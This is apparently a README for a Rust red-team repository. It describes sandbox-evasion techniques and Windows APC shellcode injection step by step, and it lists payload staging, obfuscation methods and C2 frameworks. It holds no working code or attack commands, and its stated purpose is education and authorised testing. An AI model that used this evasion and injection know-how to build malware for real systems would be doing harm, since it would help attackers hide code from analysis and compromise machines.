Educational Rust implementations of offensive security techniques for authorised penetration testing and security research.
This repository contains professionally developed proof-of-concept (PoC) payloads and offensive security tools written in Rust. All code is intended for educational purposes, authorised security testing, and defensive security research.
RedTeamingRust/
├── src/
│ ├── evasion_payload/ # Sandbox evasion techniques
│ └── apc_injection/ # APC injection demonstration
├── docs/
│ └── wiki/
│ ├── Evasion-Payload.md # Sandbox evasion documentation
│ └── Payload-Generation.md # Professional payload generation guide
└── README.md
1. Sandbox Evasion (src/evasion_payload/)
Implementation of common sandbox detection and evasion techniques:
- API Hammering - Intensive file I/O operations to stress test sandboxes
- CPU-Intensive Prime Calculation - Detect time-accelerated analysis environments
Features:
- Progress tracking and status reporting
- Configurable iteration counts
- Comprehensive error handling
- Detailed inline documentation
Build & Run:
cd src/evasion_payload
cargo build --release
cargo run --releaseDocumentation: docs/wiki/Evasion-Payload.md
References: Based on RustRedOps/API-Hammering
2. APC Injection (src/apc_injection/)
Professional implementation of Asynchronous Procedure Call (APC) injection technique for Windows.
Technique Overview:
- Creates a thread in an alertable wait state
- Allocates memory for shellcode with RW permissions
- Copies shellcode into allocated memory
- Changes memory permissions to RX (Read+Execute)
- Queues an APC to execute the shellcode
- Resumes the thread to trigger execution
Features:
- Step-by-step execution logging
- Proper error handling with Windows API Results
- Comprehensive safety documentation
- Multiple payload loading methods (file, embedded, network)
- Modular payload loader architecture
Build & Run (Windows only):
cd src/apc_injection
cargo build --release
cargo run --releaseMITRE ATT&CK: T1055.004 - Process Injection: Asynchronous Procedure Call
References: Based on RustRedOps/APC-Injection
-
- Detailed technique analysis
- Performance characteristics
- Detection and mitigation strategies
- Defence recommendations
-
- Professional payload generation methods
- Why to avoid hardcoded payloads
- Multiple loading strategies (file, network, embedded, registry)
- Encryption and obfuscation techniques
- Build system integration
- Complete working examples
Payload Generation Tools:
- Metasploit Framework (msfvenom)
- Custom shellcode development (Assembly, pwntools)
- Donut (EXE/DLL to shellcode conversion)
- C2 frameworks (Cobalt Strike, Sliver, Mythic)
Loading Methods:
- File-based loading (encrypted and plain)
- Embedded resources (compile-time inclusion)
- Environment variables (base64 encoded)
- Network staging (HTTP/HTTPS)
- Registry storage (Windows)
- Steganography (LSB in images)
Encryption Techniques:
- XOR obfuscation
- AES-256 encryption
- ChaCha20 stream cipher
For All Projects:
- Rust 1.70+ (
rustup install stable) - Cargo package manager
For APC Injection (Windows-specific):
- Windows 10/11 or Windows Server
- Visual Studio Build Tools (for linking)
# Build evasion payload
cd src/evasion_payload
cargo build --release
# Build APC injection (Windows only)
cd ../apc_injection
cargo build --releaseSandbox Evasion:
cd src/evasion_payload
cargo run --releaseAPC Injection (Windows):
cd src/apc_injection
cargo run --release- ✅ Comprehensive inline documentation
- ✅ Proper error handling with Result types
- ✅ Safety documentation for unsafe operations
- ✅ Professional code structure and organisation
- ✅ British English spelling throughout
- ✅ MITRE ATT&CK technique references
All projects use aggressive release optimisations:
[profile.release]
opt-level = 3 # Maximum optimisation
lto = true # Link-time optimisation
codegen-units = 1 # Single codegen unit for better optimisation
strip = true # Strip debug symbolsThis repository is designed for:
- ✅ Authorised Penetration Testing - With written permission from target organisations
- ✅ Security Research - Understanding offensive techniques in controlled environments
- ✅ Malware Analysis - Defensive research and threat intelligence
- ✅ Red Team Operations - Authorised security assessments
- ✅ CTF Competitions - Capture the Flag and security training exercises
- ✅ Academic Study - Educational purposes in cybersecurity courses
This code is provided for educational and authorised security research only.
- ✅ Penetration testing with written permission
- ✅ Security research in isolated lab environments
- ✅ Educational purposes in academic settings
- ✅ Defensive security research and malware analysis
- ✅ CTF competitions and security training
- ❌ Unauthorised access to computer systems
- ❌ Deployment against production systems without permission
- ❌ Malicious software development or distribution
- ❌ Bypassing security controls for illegal purposes
- ❌ Any activity violating local, state, or federal laws
The authors and contributors of this project:
- Do not condone illegal or unauthorised use
- Accept no responsibility for misuse of this code
- Provide this material for educational purposes only
- Recommend consulting legal counsel before use in security testing
Contributions that enhance the educational value of this project are welcome:
- Additional Techniques - Implement new offensive security techniques
- Documentation - Improve guides, add examples, enhance explanations
- Detection Methods - Add defensive strategies and detection signatures
- Code Quality - Refactoring, optimisations, error handling improvements
- Cross-Platform - Extend support for Linux, macOS where applicable
- Maintain educational focus and proper documentation
- Include MITRE ATT&CK references where applicable
- Add comprehensive inline comments
- Provide detection and mitigation strategies
- Follow Rust best practices and safety guidelines
Language: Rust (cross-platform)
Dependencies: rand = "0.8"
Techniques: API Hammering, CPU-intensive computation
OPSEC Level: Basic (obvious detection patterns for educational purposes)
Language: Rust with Windows FFI
Dependencies: windows = "0.58"
Platform: Windows only
Technique: Local APC injection with alertable threads
MITRE: T1055.004
- RustRedOps: https://github.com/joaoviictorti/RustRedOps Main inspiration for techniques implemented in this repository
Frameworks:
- Metasploit Framework - Payload generation
- Cobalt Strike - Advanced C2 framework
- Sliver - Open-source C2
Analysis Tools:
- Cuckoo Sandbox - Automated malware analysis
- CAPE Sandbox - Malware configuration extraction
- ANY.RUN - Interactive online sandbox
Documentation:
- MITRE ATT&CK - Adversary tactics and techniques
- Rust Security Book - Rust programming fundamentals
- Process Injection techniques (Process Hollowing, Thread Hijacking)
- Encryption and obfuscation methods
- Anti-debugging techniques
- Syscall direct invocation
- AMSI/ETW bypass demonstrations
- Reflective DLL loading
- Linux-specific techniques
- Video tutorials and demonstrations
- Detection signatures (YARA, Sigma rules)
- Blue team response guides
- Architecture diagrams
- Performance benchmarking results
For questions, discussions, or educational inquiries:
- Review the comprehensive documentation
- Study the RustRedOps project
- Consult security research communities and forums
- Engage with authorised security training programmes
This project is part of an educational security research initiative. All code is provided for educational purposes under the understanding that users will:
- Obtain proper authorisation before testing
- Use tools responsibly and ethically
- Comply with all applicable laws and regulations
- Not engage in malicious activities
Current Version: 0.1.0 Last Updated: 2025-11-26 Rust Version: 1.70+ Status: Active Development
Special thanks to:
- João Victor (@joaoviictorti) - For the excellent RustRedOps project that inspired this work
- The Rust Community - For creating a memory-safe systems programming language
- Security Researchers - For advancing the field of offensive security research